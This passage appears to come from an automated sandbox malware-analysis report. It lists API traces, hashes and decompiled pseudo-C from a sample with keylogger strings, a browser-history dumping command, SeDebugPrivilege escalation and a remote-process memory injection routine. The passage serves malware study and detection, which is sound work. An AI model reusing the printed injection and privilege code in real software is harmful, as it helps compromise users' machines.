                                          • Opcode ID: 3f1def9f96a58cc15d1bbc526656efa8d46c329ab04edfec503587d68abf9c7b
                                          • Instruction ID: 92fcf1547ebdf66eb0b87621d9a8ff62090b57e6ee7fe94dbbcc2872a12e2c7f
                                          • Opcode Fuzzy Hash: 3f1def9f96a58cc15d1bbc526656efa8d46c329ab04edfec503587d68abf9c7b
                                          • Instruction Fuzzy Hash: 9641F9705082489FEF258E64CC84BF7BBB9DB55308F2404EEE58A87242D3399E46DF65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040414D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404167
                                            • Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,73BCFBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA
                                            • Part of subcall function 0041432B: FindCloseChangeNotification.KERNELBASE( _@,00000004,00405F20,?,00000000,00000000), ref: 00414341
                                            • Part of subcall function 0041432B: CloseHandle.KERNEL32(?), ref: 0041434A
                                            • Part of subcall function 004179DC: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                                          • Sleep.KERNEL32(000000FA,0045F464), ref: 00404239
                                          Strings
                                          • /sort "Visit Time" /stext ", xrefs: 004041B3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseFile$ChangeCreateCurrentFindHandleModuleNameNotificationProcessSleep
                                          • String ID: /sort "Visit Time" /stext "
                                          • API String ID: 1769719543-1573945896
                                          • Opcode ID: c8b4856186dacc37877c82338587a1852c50972c42d9ba46998ad8dab6c3d146
                                          • Instruction ID: 7061a5f3a0732a34bedf69b2f97f4882e16be89ee39d0e7819724232ed9fbdaa
                                          • Opcode Fuzzy Hash: c8b4856186dacc37877c82338587a1852c50972c42d9ba46998ad8dab6c3d146
                                          • Instruction Fuzzy Hash: CB316371A102185BCB14FAB5DC969EE77769F90308F40007FB906775E2EF38194ACA99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004095A9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                          Download Yara Rule
                                          APIs
                                          • UnhookWindowsHookEx.USER32(?), ref: 0040961F
                                            • Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
                                            • Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
                                            • Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: EventHookLocalTimeUnhookWindowswsprintf
                                          • String ID: Offline Keylogger Stopped$[Info]
                                          • API String ID: 2949427887-1791908007
                                          • Opcode ID: 401e296d5ca654c2970b2b3bb8dcd657e39c2b4926fc386e29e92b6c915f74fd
                                          • Instruction ID: 9efaed4a8ef81a290ad5d268e4fe3922035fbc03e5cccf55ce25ae16395c1a9d
                                          • Opcode Fuzzy Hash: 401e296d5ca654c2970b2b3bb8dcd657e39c2b4926fc386e29e92b6c915f74fd
                                          • Instruction Fuzzy Hash: 0D01B531A0460157DB297729D80B7BE7BA54B42305F44057FD981222D3EABE0D5AC7DF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004425B3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsValidLocale.KERNEL32(00000000,?C,00000000,00000001,?,?,0043E33F,?,?,0043DD1F,?,00000004), ref: 004425FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LocaleValid
                                          • String ID: ?C$IsValidLocaleName
                                          • API String ID: 1901932003-3626571907
                                          • Opcode ID: d1d8c5253a1af981cfd3e37de039cb3b4bc27b4a035ec99b902d66c65b304dd4
                                          • Instruction ID: 0f43182f0e06842afc615407eccca0477f3e303412cdda621fdba0a01c3862c5
                                          • Opcode Fuzzy Hash: d1d8c5253a1af981cfd3e37de039cb3b4bc27b4a035ec99b902d66c65b304dd4
                                          • Instruction Fuzzy Hash: 92F05230680718B7DB216F209C02FAEBB64DB04B52F90402BFC016B2C2DEBD5E05958D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00412777, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00412795
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: 8E@$open
                                          • API String ID: 587946157-2601783919
                                          • Opcode ID: 4a174233fad1308712026915405e2748d4c3bbd23a7c6193313af7554f161b63
                                          • Instruction ID: a3a45966c527cb9039505bdf36bed85c4dc8a7f97c1c46fe52c99c9ff6feb995
                                          • Opcode Fuzzy Hash: 4a174233fad1308712026915405e2748d4c3bbd23a7c6193313af7554f161b63
                                          • Instruction Fuzzy Hash: 86E092712083445BD204FA72DC81EBFB398AB50309F00083FB906A10E2EF385D0C866A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004129DA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: wave$CloseStop
                                          • String ID: 8E@
                                          • API String ID: 3638528417-787191786
                                          • Opcode ID: 1d3af16e672de4a25f439eee544860deda97f69f123fda986720eb11b6d204bc
                                          • Instruction ID: 5a6495d9c5bf32114adb3f6aa644e01b82198ca3e6267900558c7952ddd75583
                                          • Opcode Fuzzy Hash: 1d3af16e672de4a25f439eee544860deda97f69f123fda986720eb11b6d204bc
                                          • Instruction Fuzzy Hash: CAE04F311182818BC311EF65E80569DB790FB51306F40053EE455D10F2EF354599DB9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F4FE, Relevance: 5.1, APIs: 4, Instructions: 124COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,0040F89B), ref: 0040F52C
                                          • IsBadReadPtr.KERNEL32(?,00000014,?,0040F89B), ref: 0040F5FE
                                          • SetLastError.KERNEL32(0000007F), ref: 0040F619
                                          • SetLastError.KERNEL32(0000007E,?,0040F89B), ref: 0040F632
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastRead
                                          • String ID:
                                          • API String ID: 4100373531-0
                                          • Opcode ID: dbeb3da561d95d77c32e75e82459f6f19270ad197ccf04568eae6f8e0ed74529
                                          • Instruction ID: 276675e80245dda8867d672efd476c996cb1fc0ae7fab6a88f5e1639ff5a30e1
                                          • Opcode Fuzzy Hash: dbeb3da561d95d77c32e75e82459f6f19270ad197ccf04568eae6f8e0ed74529
                                          • Instruction Fuzzy Hash: B3419B71A00204EFDB24CF58CC44B6AB7F5FF44711F14887AE446A7A91E739E906DB18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: Bkmhwql.exe PID: 4972 Parent PID: 3424 Bkmhwql.exeCOMMON

                                          Executed Functions

                                          Non-executed Functions

                                          Function 032F4D2C, Relevance: 5.1, Strings: 4, Instructions: 129COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000003.779727568.00000000032F4000.00000004.00000001.sdmp, Offset: 032F4000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: l.@$p.@$p.@$3C
                                          • API String ID: 0-542283486
                                          • Opcode ID: c8a749997cf1c26def18ea4b0fc89dc5befe63049a7e31b985774c4fe61c331a
                                          • Instruction ID: 125b0982d3aaaf484d858b6d10e26b0829a473ec50c17be4bca8e5260f302a1c
                                          • Opcode Fuzzy Hash: c8a749997cf1c26def18ea4b0fc89dc5befe63049a7e31b985774c4fe61c331a
                                          • Instruction Fuzzy Hash: 2A415D34530701AEE731FE26C908B23F5E9AB00758F248A3ED3A69A6D4D7F599C48784
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: logagent.exe PID: 5588 Parent PID: 3228 logagent.exeCOMMON

                                          Executed Functions

                                          Function 004049E6, Relevance: 58.0, APIs: 28, Strings: 5, Instructions: 233librarymemoryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 42%
                                          			E004049E6(void* __eflags, intOrPtr _a4, void* _a8, long _a12) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				long _v28;
				long _v32;
				long _v36;
				long _v48;
				void* _v52;
				void* _v56;
				_Unknown_base(*)()* _v188;
				_Unknown_base(*)()* _v192;
				void _v196;
				void _v200;
				long _v204;
				void _v356;
				void _v360;
				void* __ebx;
				void* __edi;
				long _t78;
				void* _t80;
				_Unknown_base(*)()* _t85;
				_Unknown_base(*)()* _t87;
				_Unknown_base(*)()* _t89;
				_Unknown_base(*)()* _t91;
				void* _t96;
				void* _t97;
				long _t119;
				void* _t121;
				struct HINSTANCE__* _t124;
				long _t126;
				void* _t129;
				void* _t137;

				_v28 = 0;
				_t78 = E004043E4(); // executed
				if(_t78 != 0) {
					_t80 = OpenProcess(0x1f0fff, 0, _t78);
					_v12 = _t80;
					if(_t80 != 0) {
						_v200 = 0;
						memset( &_v196, 0, 0x9c);
						_v16 = 0;
						_t124 = GetModuleHandleA("kernel32.dll");
						0x411ba1( &_v16);
						_push("GetModuleHandleA");
						_push(_t124);
						if(_v16 == 0) {
							_t85 = GetProcAddress();
						} else {
							_t85 = _v16();
						}
						_v200 = _t85;
						0x411ba1( &_v16);
						_push("GetProcAddress");
						_push(_t124);
						if(_v16 == 0) {
							_t87 = GetProcAddress();
						} else {
							_t87 = _v16();
						}
						_v196 = _t87;
						0x411ba1( &_v16);
						_push("WriteProcessMemory");
						_push(_t124);
						if(_v16 == 0) {
							_t89 = GetProcAddress();
						} else {
							_t89 = _v16();
						}
						_v192 = _t89;
						0x411ba1( &_v16);
						_push("LocalFree");
						_push(_t124);
						if(_v16 == 0) {
							_t91 = GetProcAddress();
						} else {
							_t91 = _v16();
						}
						_v188 = _t91;
						_v20 = VirtualAllocEx(_v12, 0, 0xa0, 0x1000, 4);
						_v24 = VirtualAllocEx(_v12, 0, 0x400, 0x1000, 0x40);
						_t96 = VirtualAllocEx(_v12, 0, _a12 + _a12, 0x1000, 4);
						_t126 = _a12;
						_v52 = _t96;
						_t97 = VirtualAllocEx(_v12, 0, _t126, 0x1000, 4);
						_v56 = _t97;
						_v48 = _t126;
						if(_v20 != 0 && _v24 != 0 && _v52 != 0 && _t126 != 0) {
							WriteProcessMemory(_v12, _t97, _a8, _t126, 0);
							E0040496D( &_v200, _a4);
							WriteProcessMemory(_v12, _v24, E00404185, 0x400, 0);
							WriteProcessMemory(_v12, _v20,  &_v200, 0xa0, 0);
							_a12 = 0;
							_v36 = 0;
							_v32 = 0;
							0x411fc6(_v12, _v24, _v20,  &_a12);
							_t137 =  &_v36;
							E004044DE(_t137);
							ResumeThread(_t137);
							WaitForSingleObject(_t137, 0x3a98);
							CloseHandle(_t137);
							_v360 = 0;
							memset( &_v356, 0, 0x9c);
							ReadProcessMemory(_v12, _v20,  &_v360, 0xa0, 0);
							_t119 = _v204;
							if(_t119 - 1 <= 0xffffe) {
								_t121 = _t119 + 0x10;
								0x413d5c(_t121);
								_t129 = _t121;
								if(ReadProcessMemory(_v12, _v52, _t129, _v204, 0) != 0) {
									_v28 = E00404915(_t129, _v204, _a4);
								}
								0x413d56(_t129);
							}
							if(_v36 != 0) {
								FreeLibrary(_v36);
							}
						}
						VirtualFreeEx(_v12, _v20, 0, 0x8000);
						VirtualFreeEx(_v12, _v24, 0, 0x8000);
						VirtualFreeEx(_v12, _v52, 0, 0x8000);
						VirtualFreeEx(_v12, _v56, 0, 0x8000);
						CloseHandle(_v12);
					}
				}
				return _v28;
			}




































                                          0x004049f4
                                          0x004049f7
                                          0x004049fe
                                          0x00404a0b
                                          0x00404a13
                                          0x00404a16
                                          0x00404a29
                                          0x00404a2f
                                          0x00404a3c
                                          0x00404a45
                                          0x00404a4b
                                          0x00404a59
                                          0x00404a5e
                                          0x00404a5f
                                          0x00404a66
                                          0x00404a61
                                          0x00404a61
                                          0x00404a61
                                          0x00404a68
                                          0x00404a72
                                          0x00404a7a
                                          0x00404a7f
                                          0x00404a80
                                          0x00404a87
                                          0x00404a82
                                          0x00404a82
                                          0x00404a82
                                          0x00404a89
                                          0x00404a93
                                          0x00404a9b
                                          0x00404aa0
                                          0x00404aa1
                                          0x00404aa8
                                          0x00404aa3
                                          0x00404aa3
                                          0x00404aa3
                                          0x00404aaa
                                          0x00404ab4
                                          0x00404abc
                                          0x00404ac1
                                          0x00404ac2
                                          0x00404ac9
                                          0x00404ac4
                                          0x00404ac4
                                          0x00404ac4
                                          0x00404ae2
                                          0x00404af6
                                          0x00404afd
                                          0x00404b0b
                                          0x00404b10
                                          0x00404b18
                                          0x00404b1b
                                          0x00404b20
                                          0x00404b23
                                          0x00404b26
                                          0x00404b55
                                          0x00404b60
                                          0x00404b76
                                          0x00404b8c
                                          0x00404b9b
                                          0x00404ba1
                                          0x00404ba4
                                          0x00404ba7
                                          0x00404bac
                                          0x00404baf
                                          0x00404bb5
                                          0x00404bc1
                                          0x00404bc8
                                          0x00404bdb
                                          0x00404be1
                                          0x00404bfe
                                          0x00404c00
                                          0x00404c0f
                                          0x00404c11
                                          0x00404c15
                                          0x00404c22
                                          0x00404c2f
                                          0x00404c3f
                                          0x00404c3f
                                          0x00404c43
                                          0x00404c48
                                          0x00404c4c
                                          0x00404c51
                                          0x00404c51
                                          0x00404c4c
                                          0x00404c6a
                                          0x00404c74
                                          0x00404c7e
                                          0x00404c88
                                          0x00404c8d
                                          0x00404c8d
                                          0x00404a16
                                          0x00404c9a

                                          APIs
                                            • Part of subcall function 004043E4: memset.MSVCRT ref: 00404406
                                            • Part of subcall function 004043E4: GetSystemDirectoryA.KERNEL32(0041E568,00000104), ref: 0040442B
                                            • Part of subcall function 004043E4: _mbscpy.MSVCRT ref: 0040443E
                                            • Part of subcall function 004043E4: memcpy.MSVCRT ref: 004044BD
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,00000000,00000000), ref: 00404A0B
                                          • memset.MSVCRT ref: 00404A2F
                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404A3F
                                            • Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
                                            • Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
                                            • Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
                                            • Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
                                            • Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C15
                                            • Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C22
                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleA), ref: 00404A66
                                          • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00404A87
                                          • GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 00404AA8
                                          • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 00404AC9
                                            • Part of subcall function 00411FC6: GetVersionExA.KERNEL32(?,00000000,000000A0), ref: 00411FE0
                                            • Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
                                            • Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
                                            • Part of subcall function 004044DE: CloseHandle.KERNEL32(?), ref: 00404553
                                            • Part of subcall function 004044DE: CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D
                                            • Part of subcall function 004044DE: FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
                                          • VirtualAllocEx.KERNEL32(00000000,00000000,000000A0,00001000,00000004), ref: 00404AE8
                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000400,00001000,00000040), ref: 00404AF9
                                          • VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B0B
                                          • VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B1B
                                          • WriteProcessMemory.KERNEL32(00000000,00000000,?,0040428D,00000000), ref: 00404B55
                                          • WriteProcessMemory.KERNEL32(00000000,?,Function_00004185,00000400,00000000,00000000), ref: 00404B76
                                          • WriteProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404B8C
                                          • ResumeThread.KERNEL32(00000000,00000000,00000000,?,0040428D,0040428D), ref: 00404BB5
                                          • WaitForSingleObject.KERNEL32(00000000,00003A98), ref: 00404BC1
                                          • CloseHandle.KERNEL32(00000000), ref: 00404BC8
                                          • memset.MSVCRT ref: 00404BE1
                                          • ReadProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404BFE
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00404C15
                                          • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 00404C2B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404C43
                                          • FreeLibrary.KERNEL32(?), ref: 00404C51
                                          • VirtualFreeEx.KERNEL32(00000000,0040428D,00000000,00008000), ref: 00404C6A
                                          • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C74
                                          • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C7E
                                          • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C88
                                          • CloseHandle.KERNEL32(00000000), ref: 00404C8D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProcVirtual$Handle$FreeProcess$Memory$AllocClose$ModuleWritememset$LibraryReadstrlen$??2@??3@DirectoryObjectOpenResumeSingleSystemThreadVersionWait_mbscpymemcpy
                                          • String ID: GetModuleHandleA$GetProcAddress$LocalFree$WriteProcessMemory$kernel32.dll
                                          • API String ID: 826043887-859290676
                                          • Opcode ID: 1fb6d780cf3ea4d95bb3018ce0ead424245e3aea99e86965f213316376af9a78
                                          • Instruction ID: 453227f2aabe0250eee1d40a9044243133179be0bc8eed6658bb11275d9bd618
                                          • Opcode Fuzzy Hash: 1fb6d780cf3ea4d95bb3018ce0ead424245e3aea99e86965f213316376af9a78
                                          • Instruction Fuzzy Hash: CA81F6B1901218BBDF21ABA1CC45EEFBF79EF88754F114066F604A2160D7395A81CFA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410DE1, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00410DF0
                                            • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0
                                          • GetLastError.KERNEL32(00000000), ref: 00410E02
                                          • GetProcAddress.KERNEL32(?,LookupPrivilegeValueA), ref: 00410E24
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?,?,LookupPrivilegeValueA,?,?,00000000), ref: 00410E34
                                          • GetProcAddress.KERNEL32(?,AdjustTokenPrivileges), ref: 00410E5A
                                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,AdjustTokenPrivileges,?,?,00000000), ref: 00410E6B
                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,00000000), ref: 00410E78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$AdjustChangeCloseCurrentErrorFindLastLookupNotificationPrivilegePrivilegesProcessTokenValue
                                          • String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$SeDebugPrivilege
                                          • API String ID: 2949824235-164648368
                                          • Opcode ID: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
                                          • Instruction ID: 180035a187f8386c87a779d0175683d60653c8262eee481a5a772ffe12dd7b09
                                          • Opcode Fuzzy Hash: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
                                          • Instruction Fuzzy Hash: D2117371900205FBDB11ABE5DC85AEF7BBCEB48344F10442AF501E2151DBB99DC18BA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407898, Relevance: 6.1, APIs: 4, Instructions: 58filestringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00407898(void** __eax) {
				void* __esi;
				void* _t15;
				int _t16;
				int _t17;
				void* _t26;
				void** _t38;
				void** _t40;
				void* _t45;

				_t40 = __eax;
				_t15 =  *__eax;
				if(_t15 != 0xffffffff) {
					_t6 =  &(_t40[0x52]); // 0x247
					_t16 = FindNextFileA(_t15, _t6); // executed
					 *(_t45 + 4) = _t16;
					if(_t16 != 0) {
						goto L5;
					} else {
						E00407930(_t40);
						goto L4;
					}
				} else {
					_t1 =  &(_t40[0x52]); // 0x247
					_t2 =  &(_t40[1]); // 0x103
					_t26 = FindFirstFileA(_t2, _t1); // executed
					 *_t40 = _t26;
					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
					L4:
					if( *(_t45 + 4) != 0) {
						L5:
						_t9 =  &(_t40[0xa2]); // 0x387
						_t38 = _t9;
						_t10 =  &(_t40[0x5d]); // 0x273
						_t28 = _t10;
						_t41 =  &(_t40[0xf3]);
						_t17 = strlen( &(_t40[0xf3]));
						if(strlen(_t10) + _t17 + 1 >= 0x143) {
							 *_t38 = 0;
						} else {
							E00406B4B(_t38, _t41, _t28);
						}
					}
				}
				return  *(_t45 + 4);
			}











                                          0x0040789a
                                          0x0040789c
                                          0x004078a1
                                          0x004078c4
                                          0x004078cc
                                          0x004078d4
                                          0x004078d8
                                          0x00000000
                                          0x004078da
                                          0x004078da
                                          0x00000000
                                          0x004078da
                                          0x004078a3
                                          0x004078a3
                                          0x004078aa
                                          0x004078ae
                                          0x004078bc
                                          0x004078be
                                          0x004078df
                                          0x004078e4
                                          0x004078e6
                                          0x004078e9
                                          0x004078e9
                                          0x004078ef
                                          0x004078ef
                                          0x004078f5
                                          0x004078fc
                                          0x00407914
                                          0x00407923
                                          0x00407916
                                          0x0040791a
                                          0x00407920
                                          0x00407928
                                          0x004078e4
                                          0x0040792f

                                          APIs
                                          • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                          • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
                                          • strlen.MSVCRT ref: 004078FC
                                          • strlen.MSVCRT ref: 00407904
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileFindstrlen$FirstNext
                                          • String ID:
                                          • API String ID: 379999529-0
                                          • Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                          • Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
                                          • Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                          • Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041208B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindResourceA.KERNEL32(?,?,?), ref: 00412098
                                          • SizeofResource.KERNEL32(?,00000000), ref: 004120A9
                                          • LoadResource.KERNEL32(?,00000000), ref: 004120B9
                                          • LockResource.KERNEL32(00000000), ref: 004120C4
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID:
                                          • API String ID: 3473537107-0
                                          • Opcode ID: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                          • Instruction ID: 6eee99af0fd3847aa000c15d4e464fa532876ff6069f3449b7718533803959f6
                                          • Opcode Fuzzy Hash: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                          • Instruction Fuzzy Hash: 0101C432600215AB8B158F95DD489DB7F6AFF8A391305C036ED09C6360D770C890C6CC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C66A, Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 185windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E0040C66A(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t56;
				struct HINSTANCE__* _t59;
				void* _t61;
				void* _t65;
				void* _t67;
				void* _t73;
				void* _t83;
				void* _t86;
				void* _t88;
				intOrPtr _t89;
				void* _t91;
				void* _t96;
				void* _t97;
				void* _t111;
				struct HWND__* _t112;
				intOrPtr* _t123;
				void* _t124;
				void* _t126;

				_t124 = _t126 - 0x68;
				 *0x41dbd4 =  *(_t124 + 0x70);
				_t56 = E00404D7A(__ecx);
				if(_t56 != 0) {
					0x412192(_t111);
					_t112 = 0;
					 *(_t124 + 0x70) = 0;
					0x410de1(); // executed
					__eflags =  *(_t124 + 0x70);
					if( *(_t124 + 0x70) != 0) {
						FreeLibrary( *(_t124 + 0x70));
					}
					 *0x41e150 = 0x11223344; // executed
					EnumResourceTypesA( *0x41dbd4, 0x412111, _t112); // executed
					_t59 =  *0x41e150;
					__eflags = _t59 - 0xe17b5ca0;
					 *(_t124 + 0x70) = _t59;
					if(_t59 == 0xe17b5ca0) {
						_t61 = E0040731C(_t124 + 0x34);
						 *((intOrPtr*)(_t124 + 0x5c)) = 0x20;
						 *(_t124 + 0x54) = _t112;
						 *(_t124 + 0x60) = _t112;
						 *(_t124 + 0x58) = _t112;
						 *(_t124 + 0x64) = _t112;
						E0040C427(_t61, _t124 - 0x384);
						 *((intOrPtr*)(_t124 + 0x14)) = _t124 + 0x34;
						E0040763D(__eflags, _t124 + 0x34,  *((intOrPtr*)(_t124 + 0x78)));
						_t65 = E004077AF( *((intOrPtr*)(_t124 + 0x14)), "/savelangfile", 0xffffffff);
						__eflags = _t65;
						if(_t65 < 0) {
							E0040902B(); // executed
							_t67 = E004077AF( *((intOrPtr*)(_t124 + 0x14)), "/deleteregkey", 0xffffffff);
							__eflags = _t67;
							if(_t67 < 0) {
								__eflags =  *(_t124 + 0x70) + 0x1e84a361 - 1;
								if( *(_t124 + 0x70) + 0x1e84a361 != 1) {
									L28:
									 *((intOrPtr*)(_t124 - 0x384)) = 0x418778;
									0x413d56( *((intOrPtr*)(_t124 + 8)));
									__eflags =  *(_t124 + 4) - _t112;
									if( *(_t124 + 4) != _t112) {
										DeleteObject( *(_t124 + 4));
										 *(_t124 + 4) = _t112;
									}
									L30:
									 *((intOrPtr*)(_t124 - 0x384)) = 0x417d40;
									E0040733E(_t124 + 0x34);
									E00407A7A(_t124 + 0x54);
									E0040733E(_t124 + 0x34);
									L31:
									_t73 = 0;
									__eflags = 0;
									goto L32;
								}
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + 0x30)) - 1;
								if(__eflags <= 0) {
									L16:
									 *0x415394(_t112);
									E0040C3AF(_t124 - 0x384);
									__eflags =  *((intOrPtr*)(_t124 - 0x238)) - 3;
									if( *((intOrPtr*)(_t124 - 0x238)) != 3) {
										_push(5);
									} else {
										_push(3);
									}
									ShowWindow( *(_t124 - 0x27c), ??);
									UpdateWindow( *(_t124 - 0x27c));
									 *((intOrPtr*)(_t124 - 0x264)) = LoadAcceleratorsA( *0x41dbd4, 0x67);
